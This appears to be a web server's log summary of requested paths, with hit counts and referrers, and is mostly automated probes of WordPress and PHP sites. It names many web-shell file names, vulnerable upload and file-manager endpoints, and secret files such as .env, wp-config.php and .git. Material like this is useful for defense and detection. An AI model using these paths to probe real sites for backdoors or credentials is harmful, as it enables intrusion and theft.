/wp-content/themes/pridmag/db.php 1 www.google.com
/wp-includes/fonts/ 6 -
/nice.php 1 -
/wp-admin/css/ 15 binance.com
/shell.php 2 www.google.com
//utchiha_uploader.php 1 -
/administrator/ 6 -
/wp-content/plugins/zaen/includes/ 6 -
/wp-content/plugins/admin.php 3 -
//tron.php 1 -
/wp-admin/images/admin.php 2 -
/wp-admin/css/colors/blue/about.php 1 www.google.com
/wp-content/themes/finley/min.php 2 -
//fox.php 1 -
//sh.php 1 -
/admin/assets/plugins/plupload/examples/upload.php 1 -
/widgets.php 1 -
/%C2%AE.php 1 -
/.well-known/acme-challenge/wp-login.php 2 -
/ 3 -
//upload.php 1 -
/xxxxxminoksxxxx2021/xxxxxminoksxxxx2021.php 1 -
/main 3 -
//503.php 1 -
//default.php 1 -
/b0.php 1 -
/theme-insqbzk.php 1 -
/fm1.php 3 -
//moon.php 1 -
/test/ 1 -
//d7.php 1 -
/wp-content/themes/famous/megaframe/megapanel/inc/functions.php 1 -
/byp.php 1 -
/wp-content/themes/agwin/config.php 1 -
//1975.php 1 -
/jquery.easing.1.3.js 1 -
/images/cloud.php 1 -
/wp-admin/css/colors/light/ 6 -
//1337.php 1 -
/wordpress/ 7 -
/wp-content/plugins/apikey/ 6 -
/cobertura/factores.php 1 -
/userfuns.php 1 -
/xmlrpc.php 1 -
/trust.php 3 -
/wp-admin/includes/themes.php 3 -
/wp-content/themes/wp-pridmag/ 6 -
/cyborg_tmp.php 1 -
//an.php 1 -
/wp-content/plugins/ 6 -
/images/ 15 binance.com
//wp-includes/home.php 1 -
/wp-includes/images/include.php 3 -
/wp-signup.php 1 -
//defaul1.php 1 -
/gf.php 7 -
/wp-content/plugins/Cache/Cache.php 4 -
/mfi.php 1 -
//wp-includes/class-json-ajax-session.php 1 -
//customize.php 1 -
/wp-admin/maint/ 6 -
//alfaindex.php 1 -
/style.php 6 www.google.com
/alfa-rex.php7 1 -
//IndoXploit.php 1 -
/wp-content/themes/quext/config.php 1 -
/ms.php 4 -
/wp-content/themes/alera/alpha.php 1 -
//wp-content/wp-conf.php 1 -
/about.php 4 -
/wp-2018.php 1 -
//wp-admin/css/colors/blue/license.php 1 -
/wp-content/themes/classic/inc/index.php 1 proditelsas.com
/.well-known/pki-validation/404.php 1 -
/wp-content/plugins/core-plugin/include.php 2 www.google.com
//srx.php 1 -
/wp-content/plugins/wp-hps/sh/ 6 -
/dropdown.php 4 -
//wp-admin/js/widgets/class_api.php 1 -
/user-new.php 1 -
//wp-admin/network/db.php 1 -
/txets.php 1 -
//__1975.php 1 -
/cawpf.php 1 -
/wp-l0gin.php 1 -
/403.php 1 -
/cache-wordpress/ 6 -
/wp-admin/user/cloud.php 1 -
/wp-content/themes/freeyanz/config.php 1 -
/wp-includes/images/wlw/ 6 -
/assets/global/plugins/jquery-file-upload/server/php/ 1 -
/ubh/ 6 -
/wp-content/plugins/seoo/wsoyanz.php 2 www.google.com
/tinymce/filemanager/dialog.php 1 -
/mt/ 6 -
/hinfofuns.php 1 -
/cgi-bin/xmrlpc.php 1 -
//by.php 1 -
/custom-header.php 1 -
/var/resource_config.json 1 -
/wp-content/plugins/about.php 3 -
//wp-info.php 1 -
/ms-delete-site.php 1 -
/admin/controller/extension/extension/ 15 binance.com
//wp_filemanager.php 1 -
/wp-zett.php 3 -
/wp-content/plugins/backup-backup/includes/kro.php 1 -
/site/wp-includes/ 6 -
//user-new.php 1 -
/cangma.php 1 -
/wp-admin/css/colors/coffee/ 6 -
/wp-content/plugins/backup-backup/admin/css/bmi-plugin-icon.min.css 2 proditelsas.com
//wp-includes/js/jcrop/about.php 1 -
//small.php 1 -
//rxr.php 2 -
/1index.php 1 -
//www.php 1 -
/wp-content/themes/thuoc-nam/ 6 -
/wp-content/plugins/fix/up.php 2 www.google.com
/assets/admin/plugins/plupload/examples/upload.php 1 -
/wso112233.php 3 -
/wp-includes/Requests/Text/index.php 1 -
//kit.fontawesome.com/be342632af.js 2 -
/.well-known/acme-challenge/atomlib.php 1 -
/wp-includes/ID3/wp-includes/IXR/ 6 -
/wp-includes/ID3/wp-login.php 2 -
/moded.php 7 -
/wp-admin/images/ 6 -
/wp-admin/options.php 4 -
/o5filRO2SH9.php 1 -
/wp-content/themes/tflow/ 1 -
//wp-includes/images/include.php 1 -
/wp-content/ 8 -
/wp-includes/js/plupload/ 6 -
/crack_self_restore.php 1 -
//406.php 1 -
/wp-content/themes/wplogin.php 1 proditelsas.com
/.tmb/wp-login.php 2 -
/moddofuns.php 1 -
/plupload/examples/upload.php 1 -
/site/wp-includes/empty.php 1 -
/doiconvs.php 1 -
/setup-config.php 1 -
/moderation.php 1 -
/cjfuns.php 2 www.google.com
//wp-content/themes/classic/inc/casper.php 1 -
/wp-add.php 1 -
/menu.php 1 -
/js/tinymce4/plugins/filemanager/dialog.php 1 -
/assets/global/plugins/plupload/examples/upload.php 1 -
/wp-content/plugins/royal-elementor-addons/assets/js/frontend.js 1 -
//wp-content/plugins/core-stab/casper.php 1 -
/wp-includes/certificates/wp-login.php 2 -
/postnews.php 1 -
/wp-content/plugins/limit/ 6 -
/wp-content/plugins/shell20211028.php 1 -
//cgi-bin/install.php 1 -
/qinfofuns.php 1 -
/edit.php 1 -
//lyda.php 1 -
//leet.php 1 -
/options-permalink.php 1 -
/upl.php 1 -
/wp-includes/wlwmanifest.xml 5 -
/pinuseren.php 1 -
//lufi.php 1 -
/about.php7 1 -
/wp-admin/network/xmrlpc.php 1 -
/wp-includes/ID3/about.php 2 -
/admin/controller/extension/wpm.php 1 -
/tmps/ 6 -
//priv8.php 1 -
/new 3 -
/wp-admin/includes/wp-conflg.php.suspected 1 -
//wp-content/themes/twentyfive/include.php 1 -
/wp-content/uploads/2022/ 6 -
/cobertura/procedimientos.php 1 -
/wp-content/shell20211028.php 1 -
//contents.php 1 -
/ecf854c.php 1 -
/new/ 1 -
/use.php 1 -
/wp-content/plugins/wplogin.php 1 proditelsas.com
//Gecko.php 1 -
//alfanew.php7 1 -
/ads.txt 6 -
/wp-mail.php 1 -
/wp-includes/Text/Diff/ 6 -
//wp-content/themes/twenty/twenty.php 1 -
/system_log.php 1 -
//fm1.php 1 -
/reservas/control.php 1 -
//xx.php 1 -
/uploads/ 15 binance.com
/wp-admin/images/moon.php 1 www.google.com
/wp-editor.php 1 -
/wp-includes/blocks/table/int/tmpl/index.php 3 -
/admin-heade.php 2 -
/dropdown.php7 1 -
/wp-cron.php 3 -
//ws.php 1 -
/credits.php7 1 -
/menu-header.php 1 -
//wp-includes/js/jcrop/cjfuns.php 1 -
/app/etc/local.xml 1 -
//wp-includes/Requests/class_api.php 1 -
/power.php 1 -
/media/mediamgr/other/jq_fileupload/server/php/ 1 -
/adminfuns.php7 1 -
//lock.php 1 -
/ovatools.php 1 -
//wp-includes/Text/about.php 1 -
//wp-includes/blocks/table/int/tmpl/index.php 1 -
/wp-content/uploads/ 6 -
/wp-content/plugins/auxin-portfolio/wpml-config.xml 1 proditelsas.com
/fun.php 3 -
/admin.php 4 -
//wp-content/plugins/press/wp-class.php 1 -
/wp-includes/js/wp-emoji-release.min.js 2 www.google.com
/radio.php 8 www.google.com
//Marvins.php 1 -
//xml.php 1 -
/edit-form-advanced.php 1 -
/wp-admin/css/colors/coffee/xmrlpc.php 1 -
/wp-content/11.php 1 -
/wp-content/bala.php 1 -
/wp-content/plugins/xt/index.php 1 -
/edit-tag-form.php 1 -
//text.php 1 -
/wp-content/themes/ 6 -
/upload/ 6 -
/chtmlfuns.php 1 -
/wp-content/plugins/cakil/ 6 -
/wp-content/themes/bala.php 1 -
//wp-admin/wp-22.php 1 -
//uploads/up.php 1 -
/alfanew.php7 3 -
//wp-file.php 1 -
/cakil/ 6 -
/wp-content/themes/blogai/issue.php 1 -
/img/cloud.php 1 -
//minishell.php 1 -
/wp-includes/repeater.php 1 -
/wp-settings.php 1 -
/admin-ajax.php 1 -
/options.php 1 -
//wp-content/plugins/revslider/includes/external/page/index.php 2 -
/wp-content/plugins/classic-editor/wp-login.php 3 -
/admin/upload/ 6 -
//css/class_api.php 1 -
/assets/plupload/examples/upload.php 1 -
/customize.php 1 -
/old/ 1 -
//wp-admin/css/colors/coffee/index.php 1 -
/mah.php 1 -
/locale.php 1 -
/old 3 -
/wp-content/plugins/wp-daft/miin.php 1 -
//css/license.php 1 -
/classfuns.php 1 -
/wp-includes/wso112233.php 1 -
/.well-known/ 16 binance.com
/wp-content/uploads/2023/index.php 2 -
/core/.env 1 -
/woh.php 1 -
/assets/developer/plupload/examples/upload.php 1 -
//admin.php 1 -
/wp-admin/wplogin.php 1 proditelsas.com
/repeater.php7 1 -
/plugin-install.php 3 -
/bala.php 5 -
/wp-admin.php 3 -
/style2.php 1 -
/onclickfuns.php 1 -
//lalala.php 1 -
/assets/tinymce/plugins/filemanager/dialog.php 1 -
/minik.php 1 -
/iR7SzrsOUEP.php 2 -
/images/common/class_api.php 1 -
//index2.php 1 -
/wp-admin/about.php 4 -
//utchiha.php 1 -
//wsoyanzorng.php 1 -
/revision.php 1 -
/cobertura/pqr/factores.php 1 -
/filemanager/dialog.php 1 -
/wp-includes/widgets/include.php 1 -
/css/cloud.php 1 -
/wp-admin/js/widgets/iR7SzrsOUEP.php 2 -
/.well-known/acme-challenge/ 6 -
/wp-content/json.php 1 -
//wp-content/dropdown.php 1 -
/wp-admin/ajax-actions.php 1 -
/wp-22.php 1 -
/wp-content/languages/ 6 -
/wp-content/themes/deep-blue/megaframe/megapanel/inc/functions.php 1 -
//fan.php 1 -
/wp-content/themes/include.php 1 -
/coaster/jquery/gallery-upload/server/php/ 1 -
/.well-known/shell20211028.php 1 -
/misc/ajax.js 5 -
//demo.php 1 -
/wp-2019.php 1 -
/wp-includes/Text/ 6 -
/wp-admin/dropdown.php 3 -
/wp-admin/css/colors/ectoplasm/ 6 -
/auto_seo.php 1 -
//wp-content/plugins/wp-file-upload/ROOBOTS.php 1 -
/cloud.php 1 -
/resources/js/tinymce/plugins/filemanager/dialog.php 1 -
//wp-content/fw.php 1 -
/wp-content/wplogin.php 1 proditelsas.com
/wp-includes/css/dist/ 6 -
/magmi/conf/magmi.ini 1 -
/wp-content/36ros.php 1 -
/magmi-importer/conf/magmi.ini 1 -
/link-parse-opml.php 1 -
/cobertura/ficha%20tecnica.pdf 1 -
/wp-includes/PHPMailer/ 6 -
/memberfuns.php 1 -
//shellx.php 1 -
//xl2023.php 1 -
/.env 7 -
/themes.php 3 -
/wp-content/plugins/linkpreview/db.php 1 www.google.com
/wp-content/languages/wp-conflg.php 1 -
/comida/medidor.php 1 -
/upload.php 1 -
/wp-admin/user/xmrlpc.php 1 -
/wp-admin/network/ 6 -
/pqr/view.php 1 -
//classwithtostring.php 1 -
/wp-content/plugins/seoplugins/db.php 1 www.google.com
/repeater.php 5 -
/wp-header.php 2 -
/bb.php 2 -
/export.php 1 -
/shell20211028.php 5 -
/wp-admin/css/colors/coffee/index.php 2 www.google.com
/wordpress/wp-includes/ 6 -
/wp-scripts.php 1 -
//xox.php 1 -
//0x.php 1 -
/wp-comments-post.php 1 -
/wp-admin/ 6 -
/wp-includes/bala.php 1 -
/magmi/web/download_file.php 1 -
/wp-content/plugins/seoplugins/mar.php 1 www.google.com
/phpformbuilder/plugins/filemanager/dialog.php 1 -
//alf.php 1 -
/wp-admin/css/colors/midnight/ 6 -
/wp-admin/includes/iR7SzrsOUEP.php 2 -
/modules/mod_simplefileuploadv1.3/elements/ 6 -
/press-this.php 1 -
/media/filemanager/dialog.php 1 -
/wp-content/plugins/column/miin.php 1 -
//.well-known/acme-challenge/class_api.php 1 -
/wp-content/upgrade/ 6 -
//utchiha505.php 1 -
//inbox.php 1 -
/inputs.php 11 www.google.com
/wp-content/plugins/cekidot/ 6 -
/wp-content/themes/alera/%C2%AE.php 1 -
/wp-content/uploads/2023/07/xl2023.php 1 -
/wp-includes/SimplePie/plugins.php 2 -
/enfile.php 1 -
//fm.php 1 -
//update-core.php 1 -
//.well-known/pki-validation/class_api.php 1 -
/admin/uploads/images/ 6 -
/wp-content/uploads/bala.php 1 -
//images/vuln.php 1 -
/nowp.php 1 -
/index1.php 1 -
/wp-links-opml.php 1 -
/92e4f6b2.php 1 -
//themes.php 1 -
/wp-admin/xmrlpc.php 1 -
/discount.php 1 -
/wp-content/plugins/db/ 6 -
//wp-blog.php 1 -
/wp-content/uploads/2023/12/config.php 1 -
//end.php 1 -
/wp-content/plugins/mw-wp-form/css/admin-common.css 2 -
//indexs.php 1 -
/wp-content/plugins/home/ 6 -
/wp-content/themes/sketch/ 6 -
/sitemap-index.xml 1 -
/api/goods.php 1 -
/upload/image/ 6 -
/sitemapindex.xml 1 -
//zz.php 1 -
//alfa.php 1 -
/home/ 6 -
/.well-known/bala.php 1 -
/xmrlpc.php 2 -
/wp-content/plugins/bala.php 1 -
/wp-includes/IXR/wp-login.php 2 -
/wp-includes/js/ 6 -
//home.php 1 -
//wp-admin/admin-ajax.php 1 -
/adminfuns.php 1 -
/text.php 1 -
/gecko.php 1 -
/assets/jquery-file-upload/server/php/ 1 -
/admin/.env 1 -
/wp-includes/pomo/wp-login.php 2 -
/my-sites.php 1 -
//wp-admin/1975.php 1 -
/assets/admin/tinymce/plugins/filemanager/dialog.php 1 -
/wp-content/plugins/content-management/content.php 1 -
/xxxxxminoksxxxx2021.php 1 -
/wp-content/themes/panama/json.php 1 -
//wp-content/alfa.php 1 -
/wp-admin/includes/xleet-shell.php 1 -
/wp-includes/sitemaps/providers/ 6 -
/wp-content/plugins/prenota/ 6 -
/sitemap.php 1 -
/wp-content/xleet.php 1 -
/cgi-bin/moon.php 1 www.google.com
/mall.php 1 -
/schallfuns.php 1 -
/.git/ 1 -
//init.php 1 -
//tools.php 1 -
/navbar.js 1 -
/wp-content/plugins/backup-backup/readme.txt 12 -
/wp-admin/user/iR7SzrsOUEP.php 2 -
/alfanew2.php7 1 -
/js/jquery-file-upload/server/php/ 1 -
/wp-content//xl2023.php 1 -
/connects.php 1 -
/wp-content/plugins/cache-wordpress/ 6 -
/cong.php 6 -
//cgi-bin/cgi-bin/about.php7 1 -
/.well-known/pki-validation/x.php 3 -
/wp-content/plugins/alfa-rex.php 2 -
/ws.php 2 -
/4price3.php 2 -
/wp-admin/images/install.php 2 www.google.com
/wp-includes/Requests/Text/admin.php 1 -
/link-add.php 1 -
/wordpress/wp-content/uploads/ 6 -
/xl.php 1 -
/wp-admin/includes/xmrlpc.php 1 -
/.well-knownold/bala.php 1 -
/wp-content/themes/twenty/twenty.php 3 -
/assets/plugins/jquery-file-upload/server/php/ 1 -
/wp-includes/xl2023.php 1 -
//wp-content/cong.php 1 -
/wp-trackback.php 1 -
//users.php 1 -
/wp-includes/js/codemirror/ 6 -
/wp-includes/fonts/css.php 1 -
//delpaths.php 1 -
/wp-includes/css/buttons.css 3 -
/tag-sitemap.xml 1 -
/wp-includes/images/media/ 6 -
//up.php 1 -
//gecko.php 1 -
/admin/plupload/examples/upload.php 1 -
/backup 3 -
/.well-known/wso112233.php 1 -
/wp-includes/Text/Diff/Renderer/ 6 -
/wp-content/plugins/ubh/ 6 -
//v3n0m.php 1 -
/wp-admin/js/widgets/ 6 -
/wp-includes/ 6 -
//classsmtps.php 1 -
/wp-content/plugins/random/ 6 -
/async-upload.php 1 -
/pass.php 1 -
/xt.php 1 -
//wp-admin/css/colors/blue/blue.php 1 -
//xmlrpc2.php 1 -
//wp-content/plugins/anttt/simple.php 1 -
/wp-content/themes/seotheme/mar.php 1 www.google.com
/4pric.php 2 -
//wp-content/plugins/yyobang/mar.php 1 -
/yanz.php 1 -
/.well-known/pkivalidation/wso112233.php 1 -
//DKIZ.php 1 -
/assets/vendor_admin/plugins/jquery-file-upload/server/php/ 1 -
/wp-includes/certificates/ 6 -
/wp-includes/ID3/wp-conflg.php 1 -
/wp-content/plugins/core-stab/ 6 -
/checkbex.php 1 -
/wp-content/themes/pridmag/ 6 -
/wp-includes/dropdown.php 1 -
/wp-content/plugins/auxin-elements/wpml-config.xml 1 proditelsas.com
/wp-content/themes/.index.php 1 proditelsas.com
/wp-class.php 1 -
/xmlrpcs.php7 1 -
/wp-admin/xleet-shell.php 1 -
/wp-pano.php 2 -
/wp-content/uploads/simple-file-list/ 6 -
/shellv3.php 2 -
/wp-content/plugins/wpeazvp/ 6 -
/wp-2021.php 1 -
/nowpf.php 1 -
/tuny.php 1 -
/class/phpformbuilder/plugins/filemanager/dialog.php 1 -
/wp-includes/IXR/themes.php 2 -
/wp-content/plugins/dzs-zoomsounds/1877.php 1 -
/sitemap/sitemap.xml 1 -
/wp-counts.php 1 proditelsas.com
//sym.php 1 -
//lock360.php 1 -
//access.php 1 -
//wp-admin/fw.php 1 -
/cd.php 1 -
/wp-content/themes/cameleon/includes/fileuploader/upload_handler.php 1 -
//wp-includes/random_compat/class_api.php 1 -
/wp-content/uploads/2021/ 6 -
//wp-plugins.php 1 -
/wp-content/themes/alera/alera/%23U00ae.php 1 -
/wp-includes/rest-api/about.php 1 -
//doc.php 1 -
/wp-includes/css/ 6 -
/wp-ok.php 1 -
/wp-includes/widgets/index.php 1 proditelsas.com
/wp-admin/css/colors/blue/xmrlpc.php 1 -
/wp-admin/includes/wp-conflg.php 1 -
/amfeed/main/download 1 -
/.well-known/pki-validation/ 6 -
/wp-content/themes/erapress/config.php 1 -
/xwirhnuz.php 1 -
/app/webroot/global/plugins/jquery-file-upload/server/php/ 1 -
/bak.php 3 -
/.well-known/acme-challenge/license.php 2 www.google.com
/sgd.php 1 -
/Ley%20679%20de%202001.pdf 1 -
//xleet.php 1 -
/wp.php 4 -
/qfunctions.php 1 -
/wp-admin/install.php 1 www.google.com
//log.php 1 -
/vendor/phpunit/phpunit/src/Util/PHP/ 6 -
//wp-includes/rest-api/about.php 1 -
/.well-known/pkivalidation/shell20211028.php 1 -
/wp-content/upgrade/iR7SzrsOUEP.php 2 -
/wp-content/plugins/userpro/skins/elegant/style.css 1 -
/.well-known/index.php 2 -
/wp-admin/cloud.php 1 -
/wp-admin/css/wp-login.php 2 -
/zm/index.php 1 -
/wp-includes/wp-info.php 1 www.google.com
//mass.php 1 -
//wp-admin/js/widgets/license.php 1 -
//media-admin.php 1 -
/wp-content/themes/shell20211028.php 1 -
/administrator/index.php 5 -
/wsoyanz.php 1 -
//wp-content/themes/welfare-charity/www.php 1 -
/wp-blog.php 1 -
/wp-admin/user/wp-login.php 6 -
/b1a3k.php 1 -
/public/plugins/plupload/examples/upload.php 1 -
/wp-includes/Text/about.php 1 -
/wp-admin/maint/maint/ajax-actions.php 1 -
//sites/all/libraries/elfinder/connectors/php/connector.php 1 -
/.well-known/pki-validation/cloud.php 2 www.google.com
/emergency.php 1 -
/xleet.php 2 -
/simple.php 10 -
/.well-known/pki-validation/ssl.php 1 -
/wp-admin/network/iR7SzrsOUEP.php 2 -
//wp-content/plugins/Cache/dropdown.php 2 -
/cut.php 1 -
/xt/index.php 7 -
/wp-content/plugins/contact-form-7/includes/js/jquery-ui/themes/smoothness/smoothness.php 1 www.google.com
//wp-content/plugins/TOPXOH/wDR.php 2 -
/class.api.php 1 -
/wp-includes/js/tinymce/skins/lightgray/img/index.php 1 -
/install.php 2 www.google.com
//z.php 1 -
//ini.php 1 -
//wp-content/plugins/ 1 -
/.well-known/admin.php 1 www.google.com
//font-editor.php 1 -
/c.php 1 -
/formcraft/file-upload/server/php/ 1 -
//dropdown.php 1 -
/media-upload.php 1 -
//wp-content/themes/include.php 1 -
/link.php 1 -
/comments/feed/ 6 -
/admin-footer.php 1 -
/comida/corporativo.php 1 -
//wp-admin/wp_filemanager.php 1 -
//repeater.php 1 -
//fw.php 1 -
/wp-admin/css/colors/blue/cloud.php 1 -
/comfunctions.php 1 -
/wp-admin/maint/iR7SzrsOUEP.php 2 -
/thems.php 1 -
//wp-content/plugins/elementor/includes/settings/index.php 1 -
//wp-content/plugins/revslider/includes/external/page/up.php 1 www.google.com
/wp-content/themes.php 2 -
/reune.php 1 -
/wp-includes/themes.php 1 -
/chosen.php 3 proditelsas.com
/wp-activate.php 1 -
/sitemap.xml.gz 3 -
//uph.php 1 -
/wp-admin/maint/wp-login.php 2 -
/axis2/ 3 -
/wp-includes/wp-class.php 2 -
//wp-content/plugins/WordPressCore/include.php 1 -
//anon.php 1 -
/xl2023.php 2 -
/alfarex.php 1 -
/media.php 1 -
/assets/ 6 -
//wp-admin/home.php 1 -
/admin/assets/global/plugins/plupload/examples/upload.php 1 -
/filefuns.php 1 -
/category-sitemap.xml 1 -
/gh.php 1 -
/wp-admin/css/colors/blue/ 6 -
//0x55.php 1 -
/upgrade.php 1 -
/assets/scripts/filemanager/dialog.php 1 -
//wp_wrong_datlib.php 1 -
/wp-content/plugins/mw-wp-form/js/admin-chart.js 1 proditelsas.com
/assets/color_admin/plugins/jquery-file-upload/server/php/ 1 -
/aver.php 1 -
/wp-content/themes/signify/firkon.php 1 -
/bk 3 -
/wp-admin/images/xmrlpc.php 1 -
/wp-content/plugins/include.php 2 -
//templates/beez3/error.php 1 -
/wp-info.php 2 www.google.com
/wp-admin/bala.php 1 -
//wp-content/languages/themes/license.php 1 -
/wp-fdd.php 1 -
/wp-scr1pts.php 1 -
//wp-content/wp_filemanager.php 1 -
/jquery.mousewheel.js 2 -
/tmp/ 6 -
/versions.php 1 -
//cp.php 1 -
//ups.php 1 -
/options-media.php 1 -
/wp-cc.php 1 -
/Simple.php 1 -
/wp-conflg.php 1 -
/4price.php 1 -
/ALFA_DATA/ 6 -
/wp-admin/includes/wp-login.php 2 -
/profile.php 1 -
/wplogin.php 1 proditelsas.com
/edit-link-form.php 1 -
/assets/lib/jquery-file-upload/server/php/ 1 -
/wp-admin/maint/moon.php 1 www.google.com
/wp-theme.php 1 -
/wp-content/themes/alera/ 6 -
/above.php 1 -
/good.php 1 -
/xlt.php 1 -
/admin/uploads/ 6 -
/wp-content/plugins/app-calendar/config.php 1 -
/autoload_classmap.php 3 -
//st.php 1 -
/sitemap_index/xml 1 -
/general.php 6 www.google.com
/load-styles.php 1 -
//wp-admin/network/class_api.php 1 -
//edit-comments.php 1 -
/wp-content/plugins/linkpreview/ 6 -
//wp-admin/js/index.php 1 -
//cjfuns.php 1 -
/include/ 6 -
/.well-known/acme-challenge/bala.php 1 -
/sitemap 3 -
/masss.php 1 -
//wp-content/plugins/Cache/Cache.php 1 -
//mar.php 1 -
/filemanager/filemanager/dialog.php 1 -
/wp-content/uploads/ao_ccss/ 6 -
/admin/editor/ 6 -
//404.php 1 -
/wp-content/upgrade-functions.php 1 -
/assets/backend/plugins/jquery-file-upload/server/php/ 1 -
/.well-known/security.txt 1 -
/wp-includes/js/tinymce/skins/wordpress/images/index.php 1 -
/coloradmin/assets/plugins/jquery-file-upload/server/php/ 1 -
/copypaths.php 1 -
/home.php 1 -
//wp-admin/dropdown.php 2 -
//class_api.php 1 -
/comdofuns.php 1 -
/options-general.php 1 -
/wp-includes/images/ 6 -
//snd.php 1 -
//exit.php 1 -
/aboutg7.php 1 -
/down.php 1 -
//million.php 1 -
/wp-includes/rest-api/ 6 -
//wp-content/upgrade/class_api.php 1 -
//my1.php 1 -
/modules/ 6 -
/.well-known/pki-validation/iR7SzrsOUEP.php 2 -
/assets/filemanager/dialog.php 1 -
/wp-content/repeater.php 1 -
/wp-content/uploads/2023/11/config.php 1 -
/wp-content/mu-plugins/ 6 -
/sitemap.xml 8 -
/ioxi-aneh.php 1 -
/public/javascript/filemanager/dialog.php 1 -
//emergency.php 1 -
/axis2/axis2-admin/ 3 -
//upl.php 2 -
/ayk.php 2 -
/wp-include/auto_seo.php 1 -
/wp-content/plugins/wp-schedule-engineer/index.php 1 -
/wp-content/plugins/essential-addons-for-elementor-lite/readme.txt 4 www.google.com
/options-writing.php 1 -
//wp-content/themes/sketch/404.php 1 -
//wp-content/plugins/instabuilder2/cache/plugins/moon.php 1 -
//wp-admin/images/install.php 1 -
/wp-includes/SimplePie/ 6 -
//wp-admin/includes/class_api.php 1 -
/content.php 3 -
//wp-content/themes/gaukingo/db.php 1 -
/M1.php 3 -
/images/iR7SzrsOUEP.php 2 -
/ms-edit.php 1 -
//wp-admin/user/class_api.php 1 -
//columns.php 1 -
/geju.php 4 -
/wp-admin/js/widgets/about.php7 1 -
/admin/ 6 -
/admin-functions.php 1 -
/cgi-bin/cloud.php 1 -
/wso-x569.php 2 -
//install.php 1 -
/wp-content/uploads/2023/ 6 -
/wp-content/themes/moog/config.php 1 -
//google.php 1 -
//assets/class_api.php 1 -
//tmp/vuln.php 1 -
/wordpress/wp-admin/includes 6 -
/ioxi.php7 1 -
/wp-admin/css/colors/ 6 -
//wp-includes/IXR/class_api.php 1 -
/wp-includes/ID3/wp-conflg.php.suspected 1 -
//cgi-bin/class_api.php 1 -
/wp-content/languages/wp-login.php 2 -
/wp-includes/fonts/wp-login.php 2 -
/new.php 1 -
//wp-content/patior/ 1 -
/css/sgd.php 1 -
//wp-includes/wp-class.php 2 -
/wp-pano 1 -
/wp-content/plugins/elementor/ 6 -
//wp-content/include.php 1 -
/images/xmrlpc.php 1 -
/siteheads.php 1 -
/.well-known/acme-challenge/wso112233.php 1 -
/zkmtq.php 1 -
//wp-includes/install.php 1 -
/wp-admin/oyy8z.php 1 -
/.well-known/acme-challenge/iR7SzrsOUEP.php 2 -
/wp-content/style-css.php 3 -
/wp-admin/network/autoload_classmap.php 2 -
/filter.php 1 -
/gettest.php 1 -
//xzourt.php 1 -
/public/assets/plugins/plupload/examples/upload.php 1 -
//wp-includes/fw.php 1 -
/wp-includes/Requests/Response/license.php 1 -
//marijuana.php 1 -
//wp-admin/js/about.php 1 -
/wp-includes/sitemaps/ 6 -
/bc 3 -
/fox.php 1 -
/modules/mod_simplefileuploadv1.3/elements/%C2%AE.php 1 -
/privacy.php 1 -
/wp-content/plugins/seoo/alfa-ioxi.php 1 -
/lock360.php 2 -
/sad.php 1 -
/wp-content/themes/rishi/ 6 -
/small.php 1 -
//403.php 1 -
/wp-content/themes/ccx/index.php 1 -
/wp-content/plugins/core/include.php 4 -
/wp-content/xl2023.php 1 -
/Admin/uploads/ 6 -
/wp-admin/css/index.php 4 -
/post.php 1 -
/wp-consar.php 1 -
//shell20211028.php 1 -
/public/javascript/jquery.upload/server/php/ 1 -
/ok.php 1 -
/wp-config.php 1 -
//F0x.php 1 -
/wp-content/themes/hello-element/footer.php 2 -
/wp-admin/network/cloud.php 1 -
/87.php 3 -
/wp-content/plugins/background-image-cropper/ups.php 1 -
//update.php 1 -
/wp-site.php 1 -
/cekidot/ 6 -
/wp-content/about.php 2 -
/term.php 1 -
//kill.php 1 -
/assets/themes/metronic/global/jquery-file-upload/server/php/ 1 -
/plugins.php 1 -
/wp-includes/Requests/ 6 -
/wp-2020.php 1 -
/alfa-rex2.php7 1 -
/wp-content/themes/about.php 2 -
/wp-includes/ID3 6 -
/wp-content/uploads/wpr-addons/forms/CasperSecurity.php 1 www.google.com
//wp-head.php 1 -
//1877.php 1 -
/ext.php 1 -
/ms-sites.php 1 -
/wp-includes/customize/wp-login.php 2 -
/1.php 1 -
//0z.php 1 -
//wp-includes/SimplePie/about.php 1 -
//.env 1 -
/admin/images/slider/ 6 -
//wp-admin/alfa.php 1 -
/wp-admin/user/ 6 -
//evil.php 1 -
/wp-content/themes/sketch/404.php 1 -
/wp-content/themes/zakra/ 6 -
//mini.php 1 -
/wp-includes/sodium_compat/src/Core/Curve25519/Ge/wp_blog.php 1 -
/plugins/plupload/examples/upload.php 1 -
/wp-diambar/includes/ 6 -
/wp-content/uploads/json.php 1 -
/post-new.php 1 -
//wp-content/install.php 1 -
/wp-p.php7 1 -
//x.php 1 -
/axis2-admin/ 3 -
/jquery-1.11.3.min.js 1 -
/Xsam_Xadoo_00Bot.php 1 -
/components/ 6 -
//wp-content/plugins/include.php 1 -
/wp-ldd.php 1 -
//payload.php 1 -
//hehe.php 1 -
/sidwso.php 1 -
/wp-content/plugins/ango/sett.php 1 -
/ms-themes.php 1 -
/wp-content/plugins/wordpresscore/include.php 1 -
/wp-includes/js/tinymce/plugins/compat3x/css/index.php 2 -
//wp-content/plugins/w0rdpr3ssnew/about.php 1 -
//tesla.php 1 -
/ms-options.php 1 -
/magmi-importer/web/download_file.php 1 -
//wp-includes/sodium_compat/src/Core/Curve25519/Ge/wp_blog.php 1 -
//R00T.php 1 -
/assets/components/ms2form/vendor/plupload/examples/upload.php 1 -
/LV.php 3 -
/lufi.php 1 -
//cgi-bin/cgi-bin/about.php 1 -
//wp-content/languages/class_api.php 1 -
//wp-includes/shell20211028.php 1 -
/my1.php 1 -
//mad.php 1 -
//css.php 1 -
/wp-content/plugins/WordPressCore/include.php 3 -
/assets/plugins/plupload/examples/upload.php 1 -
/wp-content/uploads/options-writing.php 1 -
/reset.php 1 -
/_.php 1 -
//wp-admin/fx.php 1 -
/scripts/filemanager/dialog.php 1 -
/cgi-bin/wp-login.php 2 -
/wp-admin/images/iR7SzrsOUEP.php 2 -
//xlettt.php 1 -
/wp-admin/css/colors/ocean/ 6 -
//wp-admin/shell20211028.php 1 -
/sitemap/index.xml 1 -
/wp-content/plugins/wso112233.php 1 -
/wp-admin/shell20211028.php 1 -
/wp-admin/x.php 1 www.google.com
/wp-includes/shell20211028.php 3 -
//bala.php 1 -
/wp-includes/customize/ 6 -
/a.php 3 -
//shell.php 1 -
//.tmb/class_api.php 1 -
/sites/default/files/ 15 binance.com
/moon.php 1 -
/wp-content/index.php 8 -
/.well-known/fierzashell.php 1 -
/lufixn.php 1 -
/wp-includes/ID3/ 6 -
/wp-content/plugins/td-composer/license.txt 3 -
/wp-content/plugins/BrutalShell/ 6 -
/termps.php 1 -
/hplfuns.php 1 -
